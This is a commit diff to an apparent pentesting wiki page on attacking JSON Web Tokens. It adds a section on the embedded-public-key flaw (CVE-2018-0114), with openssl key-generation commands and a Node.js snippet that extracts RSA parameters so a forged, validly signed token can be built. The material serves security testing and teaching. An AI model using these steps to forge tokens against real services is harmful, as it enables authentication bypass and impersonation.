GitBook: [master] one page and one asset modified

pentesting-web/hacking-jwt-json-web-tokens.md

@@ -131,6 +131,34 @@ Try to change this header to an URL under your control and check if any request
 
 You can also abuse both of these vulns if Open redirects, header injection or if you can upload a file inside the server and the server is just whitelisting the domain and not the path.
 
+## Embedded Public Key \(CVE-2018-0114\)
+
+If the JWT has embedded a public key like in the following scenario:
+
+![](../.gitbook/assets/image%20%28436%29.png)
+
+It's possible to generate a new private/public key, embeded the new public key inside the token and use it to generate a new signature:
+
+```bash
+openssl genrsa -out keypair.pem 2048
+openssl rsa -in keypair.pem -pubout -out publickey.crt
+openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in keypair.pem -out pkcs8.key
+```
+
+You can obtain the "n" and "e" using this nodejs script:
+
+```bash
+const NodeRSA = require('node-rsa');
+const fs = require('fs');
+keyPair = fs.readFileSync("keypair.pem");
+const key = new NodeRSA(keyPair);
+const publicComponents = key.exportKey('components-public');
+console.log('Parameter n: ', publicComponents.n.toString("hex"));
+console.log('Parameter e: ', publicComponents.e.toString(16));
+```
+
+Finally, using the public and private key and the new "n" and "e" values you can use [jwt.io](https://jwt.io/) to forge a new valid JWT with any information.
+
 ## JWT Registered claims
 
 {% embed url="https://www.iana.org/assignments/jwt/jwt.xhtml\#claims" caption="" %}